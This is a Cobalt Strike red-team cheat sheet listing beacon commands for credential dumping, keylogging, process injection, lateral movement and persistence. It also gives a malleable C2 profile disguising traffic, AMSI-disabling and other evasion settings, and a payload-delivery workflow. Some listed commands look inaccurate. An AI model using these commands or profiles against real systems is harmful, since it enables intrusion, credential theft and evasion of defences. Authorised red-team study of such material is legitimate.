Cobalt Strike Cheat Sheet

Overview

Cobalt Strike is a commercial penetration testing and red team operations platform designed to emulate advanced threat actors. It provides a post-exploitation framework that allows operators to deploy beacons (agents) on compromised systems, establish command and control (C2) channels, and perform various offensive security operations.

⚠️ Warning: Cobalt Strike is a commercial security testing tool that should only be used in environments where you have explicit permission to do so.

Core Components

Team Server

• Central command and control server
• Runs on Linux
• Manages beacons and listeners
• Provides collaboration for team operations

Client

• Java-based GUI application
• Connects to Team Server
• Interface for operators to interact with beacons
• Visualizes target networks

Beacon

• Primary payload for post-exploitation
• Establishes communication with Team Server
• Provides various capabilities for offensive operations
• Can operate in different communication modes

Setup and Configuration

Team Server Setup

# Start the Team Server
./teamserver <ip_address> <password> [malleable_c2_profile]

# Example
./teamserver 192.168.1.100 P@ssw0rd! c2-profiles/normal/amazon.profile

Client Setup

1. Launch the Cobalt Strike client
2. Connect > New Connection
3. Enter Team Server details:
   - Host: <team_server_ip>
   - Port: 50050 (default)
   - User: <username>
   - Password: <password>
4. Verify SSL certificate fingerprint

Listeners

Creating Listeners

1. Cobalt Strike > Listeners
2. Click "Add"
3. Configure listener settings:
   - Name: <listener_name>
   - Payload: <beacon_type>
   - Host: <callback_domain_or_ip>
   - Port: <port_number>
   - Profile: <malleable_c2_profile>
4. Click "Save"

Listener Types

Type	Description
HTTP	Uses HTTP for C2 communication
HTTPS	Uses HTTPS for C2 communication
DNS	Uses DNS queries for stealthy C2
SMB	Uses named pipes for peer-to-peer C2
TCP	Uses direct TCP connections
Foreign	Integrates with other C2 frameworks

Payload Generation

Beacon Payload Types

Attacks > Packages > <payload_type>

Payload Type	Description
Windows Executable	Standard .exe file
Windows Service EXE	Service executable
DLL	Dynamic Link Library
PowerShell	PowerShell one-liner
Python	Python script
Office Macro	Macro for Office documents
Shellcode	Raw shellcode

Artifact Kit

Attacks > Packages > Windows Executable (S)

• Generates custom payloads with evasion techniques
• Modifies signatures to avoid detection
• Customizable templates

Beacon Commands

Session Management

Command	Description
help	Display help information
sleep [seconds] [jitter%]	Set sleep time and jitter
checkin	Force immediate check-in
exit	Terminate the beacon session
clear	Clear the beacon's task queue
jobs	List running jobs
jobkill [JID]	Kill a running job
mode dns	Switch to DNS mode
mode dns-txt	Switch to DNS-TXT mode
mode dns6	Switch to DNS6 mode
mode http	Switch to HTTP mode
mode smb	Switch to SMB mode

Information Gathering

Command	Description
hostname	Get the hostname
ipconfig	Display network configuration
netstat	Display network connections
ps	List running processes
tasklist	Alternative to ps
getuid	Get current user ID
whoami	Get detailed user information
pwd	Print working directory
drives	List available drives
dir [directory]	List files in directory
ls [directory]	Alternative to dir
net [command]	Execute net command
reg query [path]	Query registry
sysinfo	Get system information

File Operations

Command	Description
cd [directory]	Change directory
cp [source] [destination]	Copy a file
mkdir [directory]	Create a directory
mv [source] [destination]	Move or rename a file
rm [file]	Delete a file
rmdir [directory]	Delete a directory
cat [file]	Display file contents
download [file]	Download a file from target
upload [file]	Upload a file to target
timestomp [file] [template]	Modify file timestamps
ls-acl [file]	List file permissions

Process Operations

Command	Description
execute [program]	Execute without capturing output
shell [command]	Execute and capture output
run [program]	Execute a program
runas [user] [password] [program]	Execute as another user
pth [user] [domain] [hash]	Pass-the-hash to create a token
steal_token [pid]	Steal token from process
make_token [domain] [user] [password]	Create a token
rev2self	Revert to original token
getprivs	Enable system privileges
getsystem	Attempt to get SYSTEM privileges
execute-assembly [file.exe]	Execute .NET assembly in memory
powerpick [command]	Execute PowerShell without powershell.exe
powershell [command]	Execute PowerShell command
psinject [pid] [command]	Execute PowerShell in specific process
shinject [pid] [arch] [file.bin]	Inject shellcode into process
dllinject [pid] [file.dll]	Inject DLL into process
dllload [file.dll]	Load DLL in beacon process

Lateral Movement

Command	Description
psexec [target] [listener]	Use PsExec to deploy beacon
psexec_psh [target] [listener]	Use PsExec with PowerShell
winrm [target] [listener]	Use WinRM to deploy beacon
wmi [target] [listener]	Use WMI to deploy beacon
ssh [target:port] [user] [pass] [listener]	Use SSH to deploy beacon
ssh-key [target:port] [user] [key] [listener]	Use SSH with key authentication
dcsync [domain] [user]	Use DCSync to extract password hashes
jump [method] [target] [listener]	Jump to target using specified method
remote-exec [method] [target] [command]	Execute command on remote system

Pivoting

Command	Description
rportfwd [bind port] [forward host] [forward port]	Set up reverse port forward
rportfwd stop [bind port]	Stop reverse port forward
socks [port]	Start SOCKS proxy server
socks stop	Stop SOCKS proxy server
spunnel [host] [port]	Create encrypted tunnel over SMB
spunnel stop	Stop encrypted tunnel
covertvpn [interface] [IP/Mask]	Deploy Covert VPN interface
covertvpn stop	Stop Covert VPN
pivot [host] [port]	List pivot listeners
pivotlistener [host] [port]	Create pivot listener

Post-Exploitation

Command	Description
mimikatz [command]	Execute Mimikatz command
hashdump	Dump password hashes
logonpasswords	Dump credentials from memory
keylogger [pid]	Start keylogger
screenshot [pid]	Take screenshot
screenwatch [pid]	Watch target's screen
printscreen	Take screenshot using PrintScreen
reg query [path]	Query registry
powerview [command]	Execute PowerView command
portscan [targets] [ports] [discovery method]	Scan for open ports
browserpivot [pid] [port]	Hijack authenticated web sessions
chromedump	Dump Chrome cookies and login data
persist [method] [listener]	Set up persistence
elevate [exploit] [listener]	Attempt privilege escalation

Malleable C2 Profiles

Basic Structure

# Global options
set sleeptime "5000";
set jitter "10";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36";

# HTTP staging
http-stager {
    set uri "/jquery-3.3.1.min.js";
    client {
        header "Accept" "text/javascript, application/javascript, */*";
    }
    server {
        header "Content-Type" "application/javascript";
    }
}

# HTTP client
http-get {
    set uri "/api/v1/data";
    client {
        header "Accept" "application/json";
        metadata {
            base64;
            prepend "session=";
            append ";";
            header "Cookie";
        }
    }
    server {
        header "Content-Type" "application/json";
        output {
            json {
                "status" "success";
                "data" "";
            }
            prepend "{\"data\":\"";
            append "\"}";
            base64;
        }
    }
}

Testing Profiles

# Verify profile syntax
./c2lint c2-profiles/normal/amazon.profile

# Start Team Server with profile
./teamserver 192.168.1.100 P@ssw0rd! c2-profiles/normal/amazon.profile

Aggressor Scripts

Basic Script Structure

# Event handlers
on beacon_initial {
    println("New beacon: " . $1);
}

# Aliases (custom commands)
alias hello {
    blog($1, "Hello, World!");
}

# Menus
popup beacon_bottom {
    item "Custom Command" {
        blog($1, "Executing custom command...");
        bshell($1, "whoami");
    }
}

# Functions
sub get_system_info {
    bshell($1, "systeminfo");
}

Common Script Functions

Function	Description
blog($1, "message")	Write to beacon console
bshell($1, "command")	Execute shell command
bpowershell($1, "command")	Execute PowerShell command
bpowerpick($1, "command")	Execute PowerShell without powershell.exe
bexecute_assembly($1, "/path/to/file.exe")	Execute .NET assembly
bdllspawn($1, "/path/to/file.dll")	Inject Reflective DLL
bpsexec($1, "target", "listener")	Execute PsExec lateral movement
bwmi($1, "target", "listener")	Execute WMI lateral movement
bwinrm($1, "target", "listener")	Execute WinRM lateral movement

OPSEC Considerations

Process Injection

# Set parent process for new processes
ppid [pid]

# Set process to spawn for post-ex jobs
spawnto x64 %windir%\\sysnative\\rundll32.exe
spawnto x86 %windir%\\syswow64\\rundll32.exe

# Mask command-line arguments
argue [command] [fake arguments]

# Block non-Microsoft DLLs
blockdlls start
blockdlls stop

Evasion Techniques

# Obfuscate beacon in memory
sleep_mask [seconds] [jitter%]

# Configure staging process
stage {
    set obfuscate "true";
    set stomppe "true";
    set cleanup "true";
}

# Disable AMSI
amsi_disable

# Use smarter process injection
smartinject

Common Workflows

Initial Access

1. Create a listener (Cobalt Strike > Listeners)
2. Generate a payload (Attacks > Packages)
3. Deliver payload to target
4. Wait for beacon check-in

Privilege Escalation

1. Check current privileges: getuid
2. Attempt to get SYSTEM: getsystem
3. If unsuccessful, try specific exploits: elevate [exploit] [listener]
4. Verify new privileges: getuid

Credential Harvesting

1. Dump hashes: hashdump
2. Dump credentials from memory: logonpasswords
3. Use Mimikatz for advanced options: mimikatz [command]
4. Extract domain hashes (if DC): dcsync [domain] [user]

Lateral Movement

1. Identify targets: net view
2. Choose lateral movement technique:
   - psexec [target] [listener]
   - winrm [target] [listener]
   - wmi [target] [listener]
3. Verify new beacon check-in

Persistence

1. Choose persistence method:
   - persist [method] [listener]
   - schtasks [options]
   - service [options]
   - registry [options]
2. Verify persistence works
3. Document persistence mechanisms for cleanup

Resources

• Official Cobalt Strike Documentation
• Cobalt Strike User Guide
• Malleable C2 Profiles
• Aggressor Script Documentation
• Cobalt Strike MITRE ATT&CK Mapping